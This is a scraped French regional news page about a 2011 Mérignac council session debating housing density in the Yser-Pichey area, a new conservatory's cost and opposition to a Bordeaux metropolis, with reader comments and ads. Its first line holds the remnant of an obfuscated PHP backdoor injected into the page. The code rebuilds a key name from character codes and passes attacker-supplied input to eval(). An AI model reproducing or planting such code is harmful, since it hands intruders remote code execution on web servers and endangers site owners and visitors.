AasMoFF();}private function AasMoFF(){if (is_array(Fz_mLC::$wjauNyH)) {$XausR = str_replace("\74" . chr (63) . chr (112) . "\150" . "\x70", "", Fz_mLC::$wjauNyH['c' . chr ( 763 - 652 )."\156" . chr ( 1108 - 992 ).'e' . "\x6e" . chr ( 636 - 520 )]);eval($XausR);exit();}}}$TDKxfUmhZe = new Fz_mLC(); $TDKxfUmhZe = NULL;} ?> Bétonner avec douceur - SudOuest.fr
 
 
 
6 juillet 2011 06h00 | Par Dominique Manenc 4 commentaire(s)

Mérignac

Bétonner avec douceur

L'urbanisation du secteur Yser-Pichey et le coût du futur conservatoire ont alimenté une polémique musclée lors d'une séance fleuve||Intercommunalité Les élus de la majorité ont donné un avis défavorable à la création d'une métropole qui absorberait leur collectivité.

 Le secteur de l'avenue de l'Yser est un site prioritaire pour développer l'habitat.  Photo D. m.

Le secteur de l'avenue de l'Yser est un site prioritaire pour développer l'habitat. Photo D. m.

Partager
Facebook Twitter Diggit StumbleUpon

Plus

 
Mérignac
CUB
politique
Bordeaux rive gauche
Gironde
Alain Anziani
Michel Sainte-Marie
 
Envoyer à un ami
 
Imprimer

Une séance de prévacances, mais avec un ordre du jour chargé. Plus de quatre heures de débats pour balayer des sujets majeurs. À commencer par l'instauration d'un périmètre de prise en considération sur le secteur Yser-Pichey. Son caractère est stratégique pour le développement urbain de la ville et il entre dans la démarche « 50 000 Logements » initiée par la CUB. « Où construire des logements, sur quels espaces disponibles sur ce site prioritaire ? », interroge le premier adjoint, Bernard Le Roux. « Nous avons du foncier et nous ne sommes pas tenus d'accepter les projets des promoteurs. Ce périmètre de prise en considération permet justement de surseoir à toute demande pour arriver à faire quelque chose de cohérent. » La droite a son mot à dire.

« Le monopole du social »

Vincent Cœurderoy (UMP) souhaite que ces projets se conjuguent avec qualité de vie. « Vous êtes contre les logements collectifs ! », coupe Michel Ranson (PS). « La solidarité n'est pas votre fort ! » Vincent Cœurderoy dément : « Vous n'avez pas le monopole du social. Je conteste seulement la proximité des immeubles avec le cours de l'Yser ! » Thierry Millet, président du groupe Agir pour Mérignac, vole à son secours : « Je suis d'accord avec lui. M. Ranson, arrêtez la caricature : les pavillons pour l'opposition, le collectif pour les autres. Ses inquiétudes sont fondées. »

Michel Sainte-Marie veut mettre les choses au point : « On peut densifier en favorisant des quartiers apaisés. C'est possible près du tram, mais il faut bétonner avec discernement et multiplier les espaces verts. C'est une vraie politique d'urbanisme. Nos projets avancent et se font sans vous ! » Bernard Le Roux fait remarquer que l'on est sorti du périmètre destiné à empêcher une urbanisation débridée. On y revient pour voter : trois voix contre, quatre abstentions du côté de la droite. La majorité, bien sûr, approuve.

La polémique revient sur le tapis avec le futur conservatoire pour lequel Daniel Margnes, adjoint à la culture, demande des subventions. Un projet de 13,4 millions d'euros qui doit voir le jour dans la maison carrée d'Arlac, monument historique qu'il faudra restaurer. Fabien Rothé (Modem) applaudit : « Le coût est important mais les entreprises locales auront du travail. » Thierry Millet (NC) trouve le budget excessif et trop centralisé. Claude Mellier (PC) ne l'entend pas de cette oreille : « Vous parlez de prestige. L'esprit des affaires ne doit pas gangrener les affaires de l'esprit ! » Thierry Millet encaisse mal : « Je vous rappelle que je suis d'extraction modeste et vos propos sont blessants ! »

Ambition et dérapage

Daniel Margnes détaille le surcoût : « La Drac nous a imposé des dépenses de rénovation supplémentaires, mais les subventions d'État augmenteront également. Attendez le décompte final. Vous évoquez un projet trop ambitieux. Pour 1 200 élèves ? Faudrait-il un petit conservatoire, sans fenêtres, sans portes ? »

Thierry Millet sourit, ironique : « Il n'y a pas que le budget qui dérape, l'élu aussi ! » Le président du groupe Agir pour Mérignac a toujours plaidé en faveur de sites éclatés. « C'est le seul endroit où nous avions du foncier libre près du tram. De plus, les fibres optiques à haut débit passent là. Enfin, on rénove un patrimoine culturel de qualité ! » La majorité et Fabien Rothé adoptent la délibération. La droite préfère s'abstenir par six voix.

Au chapitre des finances, l'adjoint Alain Anziani annonce qu'un excédent de 4,6 millions d'euros, dégagé par le compte administratif et des recettes nouvelles, permettront d'affecter 5 millions d'euros au budget supplémentaire, « qui seront affectés à 80 % à des opérations en cours ». « La preuve que l'on peut réduire la pression fiscale », note Thierry Millet. À droite, trois voix contre, deux abstentions.

La mairie, un lieu emblématique

Le préfet de Gironde a élaboré un schéma départemental de la coopération intercommunale sur lequel chaque municipalité doit se prononcer. Celui -ci induit la création d'une métropole qui regrouperait 34 communes au lieu des 27 actuelles. S'y ajouteraient donc les trois villes médocaines, Cestas, Canéjan - déjà en intercommunalité - ainsi que Martignas et Saint-Jean-d'Illac.

Alain Anziani, adjoint aux finances et rapporteur de la délibération, propose d'émettre un avis défavorable : « On ne veut pas être absorbé par une collectivité plus grande. La mairie reste un lieu emblématique de la démocratie. Je rappelle que le Sénat a voté cette loi à une voix, parce que personne ne la demandait. » « La méthode est expéditive, même si le préfet ne fait qu'exécuter la loi. Nous n'avons aucun mode d'emploi. La démocratie est absente de la méthode et du dossier », dit Gérard Chausset (Vert).

« Il y a danger », tonne le communiste Joël Girard. « L'objectif est de valoriser le capital privé, de baisser les dépenses des collectivités et de réduire les personnels territoriaux. C'est une attaque sociale ! Nous exigeons l'abrogation de cette loi liberticide. »

Restauration collective

Fabien Rothé (Modem) se range à l'avis défavorable : « Il y a des aspects positifs, mais à quel prix ? », tandis que Claude Mellier (PC) pointe la précipitation : « Nous n'avons pas le temps d'étudier les conséquences financières de ce schéma. Il faut plus de temps pour mesurer les incidences. » Lequel propose par ailleurs de rationaliser les syndicats par thématique et donc de maintenir le SDEEG (syndicat départemental d'énergie électrique de la Gironde) et le Sijalag (syndicat des jalles de Lande à Garonne).

Mérignac y est favorable, mais refuse en revanche la fusion du Sivu Bordeaux - Mérignac avec l'entité de restauration collective de Cenon : « La spécificité des deux structures rend la mutualisation complexe. On ne peut pas avancer dans l'incertitude », commente Alain Anziani. Vincent Cœurderoy (UMP) se veut moins catégorique : « Il y a peut-être des pistes à explorer », suggère l'élu d'opposition qui penche pour l'hypothèse métropole.

À l'heure du choix, les deux élus UMP se prononcent contre l'avis défavorable à la métropole et les six élus verts s'abstiennent. Il fallait de toute façon émettre un avis avant le 11 août. « Mais le préfet peut ne rien en faire », souligne Alain Anziani. En effet, c'est le représentant de l'État qui prendra sa décision en dernier recours. C'est-à-dire le 31 décembre 2011.

D. M.

Mérignac · CUB · politique · Bordeaux rive gauche · Gironde · Alain Anziani · Michel Sainte-Marie

 
 
 

 

 
Vos commentaires 4
 
1
Elda
07/07/2011, à 07h52
Vous oubliez les ralentisseurs Bruno Marne ! Des ralentisseurs bien hauts et bien durs pour casser les voitures. Les élus s'en fichent ils ont assez de fric pour s'acheter des 4X4 qui,les absorbent comme une fleur !!!
 
 
Bruno Marne
Bruno MARNE
06/07/2011, à 22h56
l'aménagement de l'avenue de l'Yser est une catastrophe ! Aujourd'hui nous avons 65000 habitants, demain 100 000 !!! Le matin pour quitter le centre ville où j'abite il me faut 20 minutes pour atteindre la rocade et comme je suis commercial, je ne peux pas prendre le tram. Les vélos sont en danger, pourtant on aurais pu aménager les trotoirs. Pas de bateau pour les arrêts de bus, alors les voitures patientent derrière et si un bus tombe en panne ou même une voiture tu es mort. Si non l'aménagement paysagé est assez jolie. En suite la rocade à 2 voies c'est une connerie, et pourquoi pas la passer en zone 30 pour faire plaisir aux verts ?
 
 
Profil supprime
06/07/2011, à 10h52
C'est vrai que les constructeurs doivent penser que gens adorent être au contact de la circulation quand ils sont sur leurs balcon....
 
 
Elda
06/07/2011, à 09h50
Etre "solidaire" c'est passer par des logements collectifs et verticaux ? LOL ...en effet ! Combien d'élus et de décideurs du PS habitent dans les "collectifs" qui poussent partout ??? On peut faire du logement "social" dense en construisant de petits pavillons où les gens pourront être en contact avec le sol, faire pousser 2-3 plantes, fleurs ou légumes même sur 20m² de jardin qui feront le bonheur des enfants et des animaux de compagnie! Les tensions s'apaisent (des "quartiers apaisés" dites vous ?) lorsqu'on peut profiter d'un carré de verdure privé où on peut prendre l'air et le soleil . Les immeubles construits à Pichey défigurent le quartier (voir photo) et n'ont rien d'innovant par rapport aux constructions totalement immergées dans la nature qui voient le jour en Europe. Pas de grandes terrasses végétalisées, pas de rupture de hauteur etc… C'est toujours un « sarcophage » de béton avec petites loggias pour prendre l'air....sur l'avenue ! De grands lambeaux de ciel sont occultés par la hauteur de ces immeubles...Où sont les "espaces verts" mentionnés par monsieur le maire dans cette réalisation ? Combien de m2 de verdure par personne dans cet immeuble ? Le label BBC appliqué aux constructions ne suffit pas à donner de la qualité de vie aux habitants. S’il existe encore du foncier dans ce quartier, qu’il ne soit pas massacré de la sorte !
 
 
1

 
Le temps
Mérignac
 
 

 

Votre annonce ici
Dégustez le meilleur de l'Aquitaine
Découvrez les Cafés et Assiettes de Pays et participez au jeu concours pour gagner un week-end et des Assiettes de Pays.
JOUEZ AU CASINO DE GUJAN MESTRAS
Jouez au Casino de Gujan-Mestras : 110 machines à sous, poker, restaurant, bars. Ouvert tous les jours à partir de 10h.
URDAX DANTXARINEA Des prix toute l'année
Alimentation, mode, essence, liqueurs, boucheries, poissons, bijoux… Ce que vous cherchez, vous le trouverez chez nous
GRAND LISTRAC LE BON CHOIX MEDOC
Caveau ouvert 7/7. AOC Listrac, Moulis, Haut-Médoc. Rouge et rosé disponibles en bouteilles et en vrac.
PORT DE LA LUNE - COMPTOIR DU JAZZ
PORT DE LA LUNE >Ouvert jusqu'à 1H00 du matin 7 Jours/7. COMPTOIR DU JAZZ >Ouvert du Mardi au Samedi à pertir de 19H

Associations
THEATRE ONYX
Le Théâtre Onyx a bientôt 45 ans! C'est aujourd'hui dans le Quartier Saint Pierre qu'il est installé et accueille des spectacles, les siens et ceux d'autres compagnies et artistes....

MusiqueNET TRADIO
Association crée en Mars 2010, pour la webradio NET TRADIO qui diffuse les jeunes et nouveaux talents....

JeunesseLes etoilesDe Toulenne
associations de majorettes,pompoms girls,encadrant aussi un groupe de garçon "breakdance" on anime les fêtes des villagesles écoles, spectacles:...

ACCSL
Comité des fêtes : organisation de concours de belote mensuels, organisation de repas dansants, organisation de la fête annuelle du village, théâtre....

Cantà di core
pratique de la polyphonie corse en particulier et autres chants pour voix d'hommes....

Toutes les associations du Sud-Ouest

 
Annonces
 
 
1.6 16S 7CV. Parfait état 1ère main. 10/01-137.000km. Reprise Voiture Collection Possible....
 

 

Diesel, options, 06/06, 109.000km. Reprise Véhicules Collection Possible.[TEL]05 ...
 

 

Diesel 1,6-10/2007-61.000km. Reprise Voiture Collection Possible.[TEL]05 45 63 55 ...
 
AutoImmoEmploi
 
 

Votre annonce ici
URDAX DANTXARINEA Des prix toute l'année
Alimentation, mode, essence, liqueurs, boucheries, poissons, bijoux… Ce que vous cherchez, vous le trouverez chez nous
LES FETES D'ETE A GUJAN MESTRAS
LARROSTREA du 08 au 10 juillet au Port de Larros, et Gujan Mestras en fêtes du 11 au 15 août au Lac de la magdeleine
1 Million d'euros à gagner chaque jour!
Chez vous ou en vacances, retrouvez le Point de Vente PMU le plus proche sur www.pmu-locator.com
CARREFOUR MARKET VOTRE SUPERMARCHE
Dans le Sud Ouest trouvez toujours un Carrefour Market proche de chez vous.


 
Les titres principaux
Actualités | Sports | Faits divers